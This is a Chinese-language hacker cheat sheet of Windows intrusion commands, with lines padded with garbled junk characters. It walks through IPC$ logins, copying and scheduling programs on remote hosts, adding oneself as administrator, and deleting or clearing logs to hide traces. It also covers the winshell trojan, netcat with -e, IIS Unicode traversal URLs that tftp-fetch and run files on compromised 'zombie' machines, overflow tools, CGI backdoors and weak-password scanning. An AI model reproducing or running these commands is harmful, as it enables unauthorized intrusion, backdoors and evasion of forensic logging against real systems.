网管和黑客都必须知道的命令
K-#Rm%J+Wy 常用的几条NET命令:
vWj|[| <rX v$,9l+�p�/ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
���
gZvl
D ,:;_j<g�`e (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
X1��" `0r3 �q@�^=i�m (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
A4�SM�@r�y �7H./o �Vl (查看远程主机时间) net time \\IP地址
Hi�|O�e�u �Z7%�>O:@z (定时启动某个程序) at \\IP地址 02:18 readme.exe
�fQe-�v_K� ]�54V�9l:� (查看共享) net view \\IP地址
^WUF3Q**OU ~r�Ko�5#�D (查看netbios工作组列表) nbtstat -A IP地址
&d6'$h:kHb rZzto;�NDS (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
GMiWS:`;v` 6wxQ_Qz:Q� (这两条把自己增加到管理员组): net user 用户名 密码 /add
N4$0ptz#}G Ai�/a�y# E net localgroup Administrators 用户名 /add
MMcHz�R�F� u��2BVQ<SA (断开连接) net use \\IP地址\ipc$ /delete
`U?;9!|;6� +]�I7�)�� 扫尾:
O":x$>'t�� C9�6|T>�bk del C:\winnt\system32\logfiles\*.*
)vo �PH)!� �{mI95g�&� del C:\winnt\ssytem32\config\*.evt
f?�
ko%c_p �z3>}���(+ del C:\winnt\system32\dtclog\*.*
&@{�Ba��~S 8)�M �.�W� del C:\winnt\system32\*.log
�J *^|�ojX B�Q".$(c
q del C:\winnt\system32\*.txt
���LN_6>u �UWm��WouA del C:\winnt\*.txt
.dl1�sv�
U \N7
E!��82 del C:\winnt\*.log
��R$c�g\DD q/&�Z6LJ�) 一、netsvc.exe
�gLu�#M:4N
@(o�z�`|* 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
ZW�*��"Kok 4�qiG�>^h9 netsvc /list \\IP地址
�R]L�7�?=� �VNA� �VdP netsvc schedule \\IP地址 /query
[�x,_0-��_ ��lSQANC'� netsvc \\IP地址 schedule /start
�X�g�op�1 �qhiQ!�fMQ 二、OpenTelnet.exe
��-pcYhLIn a o�\+��%s 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�
27w]Q_�C E!jM&\Z�j� OpenTelnet \\IP地址 用户名 密码 1 7878
�]<�T�gBo| HJoPk�'�p% 然后就可以telnet到主机的7878端口,进入DOS方式下:
o;-)�8�4Aa lvk(q�\-f telnet IP地址 7878
���[T� !#s d�;)Im
"� 三、winshell.exe
��j�C��<<S \
$z.x-U�� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
k���>U&Us0 ��obS|wTG~ p Path (查看winshell主程序的路径信息)
H��W���D�
H@�5:��x�8 b reBoot (重新启动机器)
��StaX~J6= v8_H�aA$5Y d shutDown (关闭机器)
P\N$��TYeH ��R\1#)3e0 s Shell (执行后你就会看到可爱的“C:\>”)
u;��;]S!:M #![b9~%WTh x eXit (退出本次登录会话,此命令并不终止winshell的运行)
� |Pwb7:a3 3*X�X@�>|o CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
xH��e<TwkI �_�T8#36iR 四、3389登陆器,GUI方式登录远程主机的
�g:O�~1�jq �Y �<Ta2�H 五、elsave.exe
KS3
�/���� M�|6�
W�<y 事件日志清除工具
`R=8=6Z+$q �fMI4'.O�d elsave -s \\IP地址 -l "application" -C
B� k#�68p� w�/E4w��p� elsave -s \\IP地址 -l "system" -C
;4�0!2P8�t (/tb�e�@�< elsave -s \\IP地址 -l "security" -C
4Poi:0oOys C�d�dw\|'3 执行后成功清除应用程序日志,系统日志,安全日志
E(>RmPP=7� nlw(U3@��7 六、hbulot.exe
��``$At�,m q2A��x��-# 开启win2kserver和winxp的3389服务
��� 3���m� uXNJ��{]�o hbulot [/r]
3��zGx�e-� nW!rM(�$�q 使用/r表示安装完成后自动重起目标使设置生效。
4(|x@:�wxm P%g�[!9
'� 七、nc.exe(netcat.exe)
��d&P�X�J
+#A���>[,U 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�]?/[& PP, I[�W�W�1P5 想要连接到某处: nc [-options] hostname port[s] [ports] ...
8s6�[?=nM� `�GUj�.+�u 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�<dLdSE�w� :|EM�1-lwf 参数:
�n,bZj�<3t �M)!�8�`]� -e prog 程序重定向,一旦连接,就执行 [危险!!]
i/���NY86A ,��A��h�QA -g gateway source-routing hop point[s], up to 8
S�%R:GZEf_ ��GGo
n�A� -G num source-routing pointer: 4, 8, 12, ...
�& �2& K9R =X���2 Ieb -h 帮助信息
GCkc��[]2p yOxJ�x7uD� -i secs 延时的间隔
pM�H�Y�2t� "AS;\-Jk�� -l 监听模式,用于入站连接
%�AF~��K�i �ah��U\�(= -n 指定数字的IP地址,不能用hostname
�@=E�@
*@g Z6
E-Fu��O -o file 记录16进制的传输
&D�\~-fOGb t.v@\�[{�- -p port 本地端口号
9�(db�o�u� 24}�r;=�U� -r 任意指定本地及远程端口
sV@�kQ�:
@f�-0OX$* -s addr 本地源地址
KcF2}+iM�� /��~'�ZtxA -u UDP模式
�X8�~�cWW� �8B"jvrs� -v 详细输出——用两个-v可得到更详细的内容
22�a$/�/}E ��W�Foc�A: -w secs timeout的时间
w�v|:�-8V� KA#�4i��u{ -z 将输入输出关掉——用于扫描时
-��\:pbR�� 八、TFTPD32.EXE
�N����J9H= ��*6cP-Vzd 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
w&8gA[y*u ��>j{phZ� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
P PZxH�}J. 9s�5gi+l_O 然后可以直接令文件运行:
�a.��L ?J� ��zjs@7LN� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�V/j+�Z1ZW 1tHTjEG4^3 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
&Y;z[��+(P �lw�IU|T<4 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
r3<yG"�J86 y&")7y/�uE 一、一 Xscan命令行运行参数说明:
m/r��4f279 m�*tmmP�4R 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
5 5>^H�1�M ��ZM�QSy�7 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
bm*Ell\a.� ��qP�-�* xscan -file <主机列表文件名> <检测项目> [其他选项]
'P�k (
�1: T.�H���S.� 其中<检测项目> 含义如下:
0�&E{�[~Pv r5t����C�� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�$rD&rsx6� w+(bkqz�] -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
'z0@|����a 1Rc'��2Y� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
6":=p:PT. ���S-�Mn�� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
J��L��45!+ ~]a:�9E�v* -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
.YKqYN�?y4 \2~�Cn c*O [其他选项] 含义如下:
H@GiH�e��j )<-\ F%&b -v: 显示详细扫描进度
4�zX@T�I>j ZN�N�gi@6> -p: 跳过Ping不通的主机
`O ?61YUQH fx2r\ usX[ -o: 跳过没有检测到开放端口的主机
g+|1k�hS�) _"%mLH=�!8 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
